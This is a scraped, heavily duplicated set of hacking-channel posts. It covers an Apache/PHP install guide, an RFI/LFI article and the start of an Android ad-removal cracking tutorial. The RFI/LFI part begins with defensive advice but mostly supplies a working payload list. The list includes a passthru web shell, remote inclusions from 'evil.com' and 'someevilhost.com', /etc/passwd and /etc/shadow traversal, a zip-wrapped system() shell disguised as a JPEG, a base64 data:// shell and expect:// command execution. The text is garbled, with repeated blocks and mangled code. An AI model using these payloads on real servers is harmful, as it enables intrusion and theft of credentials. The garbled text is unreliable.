5) Go to the / usr / local / apache_ [version] directory (or The directory you specified in the above step).
6) Type the following configuration command and replace the [path] parameter with the path you set (such as / usr / local / apache [version], etc., be careful not to follow the slash!), And you also need to enable the mod_so parameter to allow Apache uses DSO.
./configure --prefix = [path] --enable-module = so
7) Return to the command prompt and type make and wait for the command execution to complete and return to the command prompt again.
8) Type make install.
At this point, the compiler can create the final directory and return to the system command prompt.
π¦ Next install PHP:
1)Visit the download area of ββthe PHP homepage and select the link for the latest version of the source code.
2) Place the downloaded file in an appropriate directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4)Type the following unpacking command to put the above tar file into a directory of the form php- [version]:
tar -xvf php- [version]
5) Go to the / usr / local / php- [version] directory (Or the directory you specified).
Now you can compile PHP DSO. In fact, only one necessary configuration option is needed here-with-apxs (a file in the Apache bin directory)-however, for more comprehensive system configuration, we also added a MySQL database here support.
./configure --with-mysql = / [path to mysql] --with-apxs = / [path to apxs]
6) Return to the command prompt and type make and wait until the command is complete and return to the command prompt. .
7) Type the make install command.
π¦ At this time, the compiler will create the final DSO and place it in the Apache module directory. At the same time, it will modify the Apache httpd.conf configuration file for you. After that, the system returns to the command prompt and waits for you to enter new instructions. Then, you can open the Apache httpd.conf configuration file to make some corrections:
1) Find the line with ServerAdmin and add your own email address, as follows:
ServerAdmin you@yourdomain.com
2) Find the beginning with ServerName Line, change the following parameters to actual values, such as:
ServerName localhost
3) Find the following paragraph:
# And for PHP 4.x, use:
#
#AddType application / x-httpd-php .php
#AddType application / x- httpd-php-source.phps
π¦ Install PHP as Apache DSOPHP full by undercode
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Install PHP as Apache DSOPHP is often used with the Apache Web server for Linux / Unix platforms. When we install PHP in the Apache environment, you have three installation modes to choose from: static modules, dynamic modules (DSO), and CGI.
2) I suggest you install PHP as Apached's DSO. This installation mode is very easy to maintain and upgrade. For example, suppose you originally installed only database support for PHP. But after a few days you decided to add encryption to PHP. Quite simply, you just need to type the make clean command, add new configuration options, and then execute the make and make install commands.
3) In this way, the new PHP module will be installed in the appropriate location on Apache, you just restart Apache and everything is OK, of course, the entire process does not need to recompile Apache at all.
4) The simple steps to install a new version of Apache and PHP as an
π¦ Apache DSO are as follows:
1) Download the latest version of the source code for the Apache server software from the Apache Software Foundation site.
2) Place the code files in a suitable directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4) Type the following unpacking command to place the above tar file in a directory of the form apache_ [version]:
tar -xvf apache_ [version] .tar
5) Go to the / usr / local / apache_ [version] directory (or The directory you specified in the above step).
6) Type the following configuration command and replace the [path] parameter with the path you set (such as / usr / local / apache [version], etc., be careful not to follow the slash!), And you also need to enable the mod_so parameter to allow Apache uses DSO.
./configure --prefix = [path] --enable-module = so
7) Return to the command prompt and type make and wait for the command execution to complete and return to the command prompt again.
8) Type make install.
At this point, the compiler can create the final directory and return to the system command prompt.
π¦ Next install PHP:
1)Visit the download area of ββthe PHP homepage and select the link for the latest version of the source code.
2) Place the downloaded file in an appropriate directory such as / usr / local / or / opt /.
3) Use the Gunzip command to decompress the code file, then you can get the corresponding * .tar file.
4)Type the following unpacking command to put the above tar file into a directory of the form php- [version]:
tar -xvf php- [version]
5) Go to the / usr / local / php- [version] directory (Or the directory you specified).
Now you can compile PHP DSO. In fact, only one necessary configuration option is needed here-with-apxs (a file in the Apache bin directory)-however, for more comprehensive system configuration, we also added a MySQL database here support.
./configure --with-mysql = / [path to mysql] --with-apxs = / [path to apxs]
6) Return to the command prompt and type make and wait until the command is complete and return to the command prompt. .
7) Type the make install command.
π¦ At this time, the compiler will create the final DSO and place it in the Apache module directory. At the same time, it will modify the Apache httpd.conf configuration file for you. After that, the system returns to the command prompt and waits for you to enter new instructions. Then, you can open the Apache httpd.conf configuration file to make some corrections:
1) Find the line with ServerAdmin and add your own email address, as follows:
ServerAdmin you@yourdomain.com
2) Find the beginning with ServerName Line, change the following parameters to actual values, such as:
ServerName localhost
3) Find the following paragraph:
# And for PHP 4.x, use:
#
#AddType application / x-httpd-php .php
#AddType application / x- httpd-php-source.phps
modify these configuration lines to uncomment some of the comments before AddType under PHP 4.0. At the same time you should add some file extensions used by PHP. The above modified lines may look like Here's how:
# And for PHP 4.x, use:
#
AddType application / x-httpd-php .php .phtml
AddType application / x-httpd-php-source .phps
Save the above configuration file and return to the parent directory, Start Apache by typing:
./bin/apachectl start
π¦If there are no problems during startup, you can test the installation of Apache and PHP by creating a file called phpinfo.php, which contains the following lines of code:
<? Phpinfo ()?>
> Save the file and Place it in the Apache document root directory (htdocs), then start your web browser, type http: //localhost/phpinfo.php in the browser address bar, and the browser will display a large space Various variables and variable values ββof the PHP and Apache systems.
> If you want to reset PHP, all you need to do is run the make clean command, then the ./configure command with the new configuration options, and then make and make install. In this way, a new module will appear in the Apache module directory, you just need to restart Apache to load the new module. Many previous headaches are now solved.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
# And for PHP 4.x, use:
#
AddType application / x-httpd-php .php .phtml
AddType application / x-httpd-php-source .phps
Save the above configuration file and return to the parent directory, Start Apache by typing:
./bin/apachectl start
π¦If there are no problems during startup, you can test the installation of Apache and PHP by creating a file called phpinfo.php, which contains the following lines of code:
<? Phpinfo ()?>
> Save the file and Place it in the Apache document root directory (htdocs), then start your web browser, type http: //localhost/phpinfo.php in the browser address bar, and the browser will display a large space Various variables and variable values ββof the PHP and Apache systems.
> If you want to reset PHP, all you need to do is run the make clean command, then the ./configure command with the new configuration options, and then make and make install. In this way, a new module will appear in the Apache module directory, you just need to restart Apache to load the new module. Many previous headaches are now solved.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ RFI/LFI Payload List :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. Iβll give code examples in PHP format.
2) Letβs look at some of the code that makes RFI / LFI exploits possible.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big βNOβ. Always remove any input passing through the browser. When the user clicks on βFileβ to visit βfiles.phpβ when he visits the web page, something like this will appear.
http: //localhost/index.php? page = files.php
4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.
5) Viewing files on the server is a βLocal File Inclusionβ or LFI exploit. This is no worse than an RFI exploit.
http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now letβs look at the RFI aspect of this exploit. Letβs get some of the codes weβve taken before.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
6) Now suppose we write something like β¦
http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Letβs look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named βtest.phpβ and put the following code in it and save it.
<? Php
passthru ($ _ GET [cmd]);
?>
7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it βout of service for security reasonsβ. With this code in test.php, we can send a request to the web page, including file inclusion exploit.
http: //localhost/index.php? page = http: //someevilhost.com/test.php
When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.
8) http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd
This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
9) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here Iβve prepared something easy and quick about this course for you.
π¦ RFI/LFI Payload List :
fb.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. Iβll give code examples in PHP format.
2) Letβs look at some of the code that makes RFI / LFI exploits possible.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big βNOβ. Always remove any input passing through the browser. When the user clicks on βFileβ to visit βfiles.phpβ when he visits the web page, something like this will appear.
http: //localhost/index.php? page = files.php
4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.
5) Viewing files on the server is a βLocal File Inclusionβ or LFI exploit. This is no worse than an RFI exploit.
http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now letβs look at the RFI aspect of this exploit. Letβs get some of the codes weβve taken before.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
6) Now suppose we write something like β¦
http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Letβs look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named βtest.phpβ and put the following code in it and save it.
<? Php
passthru ($ _ GET [cmd]);
?>
7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it βout of service for security reasonsβ. With this code in test.php, we can send a request to the web page, including file inclusion exploit.
http: //localhost/index.php? page = http: //someevilhost.com/test.php
When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.
8) http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd
This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
9) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here Iβve prepared something easy and quick about this course for you.
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
10) Now I hope you can see whatβs going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!
Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
11) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
10) Now I hope you can see whatβs going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!
Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
11) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android APP cracked to advertising complete tutorial Full by UnderCode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) WHAT EXCTLY WE WANT :
> Power consumption, power consumption, screen space, flickering eye-catching, accidental touch, this advertising method is intolerable for patients with obsessive-compulsive disorder, I believe most people will also be disgusted, so the commonly used apps are almost Never seen it. From the perspective of learning, I tried to hack this application and "block" the advertising function.
2) Unzip
Download the apk file, modify the suffix to .zip, and extract it to a folder
3) among them:
> assets folder -put native asset files
>lib folder -put reference library files
>META-INF folder -put manifest file
>res folder -put resource files
>AndroidManifest.xml -Android manifest
>resources.arsc -the main resources file
>The above are mainly related to resources. If you need to extract some
pictures or sound resources, you can find them directly in the folder. The remaining classes.dex file is more important. It is a packaging format for classes in Android. .
4) View the jar
To view the code, you need to convert the dex file into a jar file. Here is a recommended software "Android Reverse Assistant"
5) It integrates apktool, autosign, dex2jar, jd-gui and other common tools, which is very convenient.
Here, select the dex2jar function, browse the source files, select the decompressed classes.dex file, and click the operation button to automatically generate the classes_dex2jar.jar file.
Then select jd to open the jar function, you can call jd-gui to view the jar file.
π¦ Android APP cracked to advertising complete tutorial Full by UnderCode :
instagram.com/UnderCodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) WHAT EXCTLY WE WANT :
> Power consumption, power consumption, screen space, flickering eye-catching, accidental touch, this advertising method is intolerable for patients with obsessive-compulsive disorder, I believe most people will also be disgusted, so the commonly used apps are almost Never seen it. From the perspective of learning, I tried to hack this application and "block" the advertising function.
2) Unzip
Download the apk file, modify the suffix to .zip, and extract it to a folder
3) among them:
> assets folder -put native asset files
>lib folder -put reference library files
>META-INF folder -put manifest file
>res folder -put resource files
>AndroidManifest.xml -Android manifest
>resources.arsc -the main resources file
>The above are mainly related to resources. If you need to extract some
pictures or sound resources, you can find them directly in the folder. The remaining classes.dex file is more important. It is a packaging format for classes in Android. .
4) View the jar
To view the code, you need to convert the dex file into a jar file. Here is a recommended software "Android Reverse Assistant"
5) It integrates apktool, autosign, dex2jar, jd-gui and other common tools, which is very convenient.
Here, select the dex2jar function, browse the source files, select the decompressed classes.dex file, and click the operation button to automatically generate the classes_dex2jar.jar file.
Then select jd to open the jar function, you can call jd-gui to view the jar file.
This media is not supported in your browser
VIEW IN TELEGRAM